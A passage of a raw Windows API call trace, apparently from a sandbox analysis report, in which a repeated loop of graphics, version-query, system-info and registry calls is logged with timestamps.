lpRect=0x1817ac) returned 0 [0090.929] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.929] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.929] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.929] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.930] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa90401dc [0090.930] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab0401d9 [0090.930] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459e4 [0090.930] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459e5 [0090.930] CombineRgn (hrgnDst=0x10459e4, hrgnSrc1=0xa90401dc, hrgnSrc2=0xab0401d9, iMode=1) returned 1 [0090.930] CombineRgn (hrgnDst=0x10459e5, hrgnSrc1=0xa90401dc, hrgnSrc2=0xab0401d9, iMode=4) returned 2 [0090.930] CreateSolidBrush (color=0xff) returned 0x21059e3 [0090.930] CreateSolidBrush (color=0xff0000) returned 0x11059e6 [0090.930] DeleteObject (ho=0x11059e6) returned 1 [0090.930] DeleteObject (ho=0xab0401d9) returned 1 [0090.930] DeleteObject (ho=0xa90401dc) returned 1 [0090.930] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.930] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.930] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.930] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.930] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.930] BeginPath (hdc=0x0) returned 0 [0090.930] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.930] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.930] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.930] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.930] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.930] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.930] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.930] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.930] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac0401d9 [0090.930] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa0401dc [0090.930] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459e7 [0090.930] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459e8 [0090.930] CombineRgn (hrgnDst=0x10459e7, hrgnSrc1=0xac0401d9, hrgnSrc2=0xaa0401dc, iMode=1) returned 1 [0090.930] CombineRgn (hrgnDst=0x10459e8, hrgnSrc1=0xac0401d9, hrgnSrc2=0xaa0401dc, iMode=4) returned 2 [0090.930] CreateSolidBrush (color=0xff) returned 0x21059e6 [0090.930] CreateSolidBrush (color=0xff0000) returned 0x11059e9 [0090.930] DeleteObject (ho=0x11059e9) returned 1 [0090.930] DeleteObject (ho=0xaa0401dc) returned 1 [0090.930] DeleteObject (ho=0xac0401d9) returned 1 [0090.930] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.930] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.931] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.931] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.931] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.931] BeginPath (hdc=0x0) returned 0 [0090.931] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.931] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.931] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.931] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.931] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.931] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.931] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.931] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.024] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab0401dc [0091.024] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad0401d9 [0091.024] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ea [0091.024] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459eb [0091.024] CombineRgn (hrgnDst=0x10459ea, hrgnSrc1=0xab0401dc, hrgnSrc2=0xad0401d9, iMode=1) returned 1 [0091.024] CombineRgn (hrgnDst=0x10459eb, hrgnSrc1=0xab0401dc, hrgnSrc2=0xad0401d9, iMode=4) returned 2 [0091.024] CreateSolidBrush (color=0xff) returned 0x21059e9 [0091.024] CreateSolidBrush (color=0xff0000) returned 0x11059ec [0091.024] DeleteObject (ho=0x11059ec) returned 1 [0091.024] DeleteObject (ho=0xad0401d9) returned 1 [0091.024] DeleteObject (ho=0xab0401dc) returned 1 [0091.024] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.024] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.024] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.024] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.024] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.024] BeginPath (hdc=0x0) returned 0 [0091.024] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.024] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.024] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.024] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.024] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.024] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.024] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.024] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.025] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae0401d9 [0091.025] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac0401dc [0091.025] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ed [0091.025] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ee [0091.025] CombineRgn (hrgnDst=0x10459ed, hrgnSrc1=0xae0401d9, hrgnSrc2=0xac0401dc, iMode=1) returned 1 [0091.025] CombineRgn (hrgnDst=0x10459ee, hrgnSrc1=0xae0401d9, hrgnSrc2=0xac0401dc, iMode=4) returned 2 [0091.025] CreateSolidBrush (color=0xff) returned 0x21059ec [0091.025] CreateSolidBrush (color=0xff0000) returned 0x11059ef [0091.025] DeleteObject (ho=0x11059ef) returned 1 [0091.025] DeleteObject (ho=0xac0401dc) returned 1 [0091.025] DeleteObject (ho=0xae0401d9) returned 1 [0091.025] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.025] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.025] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.025] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.025] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.025] BeginPath (hdc=0x0) returned 0 [0091.025] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.025] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.025] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.025] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.025] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.025] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.025] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.025] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.026] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad0401dc [0091.026] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf0401d9 [0091.026] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459f0 [0091.026] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459f1 [0091.026] CombineRgn (hrgnDst=0x10459f0, hrgnSrc1=0xad0401dc, hrgnSrc2=0xaf0401d9, iMode=1) returned 1 [0091.026] CombineRgn (hrgnDst=0x10459f1, hrgnSrc1=0xad0401dc, hrgnSrc2=0xaf0401d9, iMode=4) returned 2 [0091.026] CreateSolidBrush (color=0xff) returned 0x21059ef [0091.026] CreateSolidBrush (color=0xff0000) returned 0x11059f2 [0091.026] DeleteObject (ho=0x11059f2) returned 1 [0091.026] DeleteObject (ho=0xaf0401d9) returned 1 [0091.026] DeleteObject (ho=0xad0401dc) returned 1 [0091.026] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.026] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.026] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.026] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.026] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.026] BeginPath (hdc=0x0) returned 0 [0091.026] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.026] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.026] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.026] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.026] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.026] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.026] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.026] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.026] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb00401d9 [0091.026] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae0401dc [0091.026] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459f3 [0091.027] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459f4 [0091.027] CombineRgn (hrgnDst=0x10459f3, hrgnSrc1=0xb00401d9, hrgnSrc2=0xae0401dc, iMode=1) returned 1 [0091.027] CombineRgn (hrgnDst=0x10459f4, hrgnSrc1=0xb00401d9, hrgnSrc2=0xae0401dc, iMode=4) returned 2 [0091.027] CreateSolidBrush (color=0xff) returned 0x21059f2 [0091.027] CreateSolidBrush (color=0xff0000) returned 0x11059f5 [0091.027] DeleteObject (ho=0x11059f5) returned 1 [0091.027] DeleteObject (ho=0xae0401dc) returned 1 [0091.027] DeleteObject (ho=0xb00401d9) returned 1 [0091.027] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.027] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.027] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.027] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.027] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.027] BeginPath (hdc=0x0) returned 0 [0091.027] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.027] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.027] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.027] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.027] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.027] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.027] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.027] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.027] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf0401dc [0091.027] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb10401d9 [0091.027] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459f6 [0091.027] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459f7 [0091.027] CombineRgn (hrgnDst=0x10459f6, hrgnSrc1=0xaf0401dc, hrgnSrc2=0xb10401d9, iMode=1) returned 1 [0091.027] CombineRgn (hrgnDst=0x10459f7, hrgnSrc1=0xaf0401dc, hrgnSrc2=0xb10401d9, iMode=4) returned 2 [0091.027] CreateSolidBrush (color=0xff) returned 0x21059f5 [0091.028] CreateSolidBrush (color=0xff0000) returned 0x11059f8 [0091.028] DeleteObject (ho=0x11059f8) returned 1 [0091.028] DeleteObject (ho=0xb10401d9) returned 1 [0091.028] DeleteObject (ho=0xaf0401dc) returned 1 [0091.028] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.028] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.028] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.028] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.028] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.028] BeginPath (hdc=0x0) returned 0 [0091.028] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.028] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.028] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.028] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.028] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.028] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.028] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.028] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.028] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb20401d9 [0091.028] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb00401dc [0091.028] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459f9 [0091.028] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459fa [0091.028] CombineRgn (hrgnDst=0x10459f9, hrgnSrc1=0xb20401d9, hrgnSrc2=0xb00401dc, iMode=1) returned 1 [0091.028] CombineRgn (hrgnDst=0x10459fa, hrgnSrc1=0xb20401d9, hrgnSrc2=0xb00401dc, iMode=4) returned 2 [0091.028] CreateSolidBrush (color=0xff) returned 0x21059f8 [0091.028] CreateSolidBrush (color=0xff0000) returned 0x11059fb [0091.028] DeleteObject (ho=0x11059fb) returned 1 [0091.028] DeleteObject (ho=0xb00401dc) returned 1 [0091.028] DeleteObject (ho=0xb20401d9) returned 1 [0091.029] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.029] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.029] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.029] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.029] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.029] BeginPath (hdc=0x0) returned 0 [0091.029] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.029] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.029] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.029] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.029] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.029] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.029] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.029] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.029] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb10401dc [0091.029] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb30401d9 [0091.029] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459fc [0091.029] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459fd [0091.029] CombineRgn (hrgnDst=0x10459fc, hrgnSrc1=0xb10401dc, hrgnSrc2=0xb30401d9, iMode=1) returned 1 [0091.029] CombineRgn (hrgnDst=0x10459fd, hrgnSrc1=0xb10401dc, hrgnSrc2=0xb30401d9, iMode=4) returned 2 [0091.029] CreateSolidBrush (color=0xff) returned 0x21059fb [0091.029] CreateSolidBrush (color=0xff0000) returned 0x11059fe [0091.029] DeleteObject (ho=0x11059fe) returned 1 [0091.029] DeleteObject (ho=0xb30401d9) returned 1 [0091.029] DeleteObject (ho=0xb10401dc) returned 1 [0091.029] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.029] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.030] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.030] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.030] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.030] BeginPath (hdc=0x0) returned 0 [0091.030] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.030] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.030] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.030] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.030] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.030] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.030] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.030] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.030] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb40401d9 [0091.030] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb20401dc [0091.030] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10459ff [0091.030] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a00 [0091.030] CombineRgn (hrgnDst=0x10459ff, hrgnSrc1=0xb40401d9, hrgnSrc2=0xb20401dc, iMode=1) returned 1 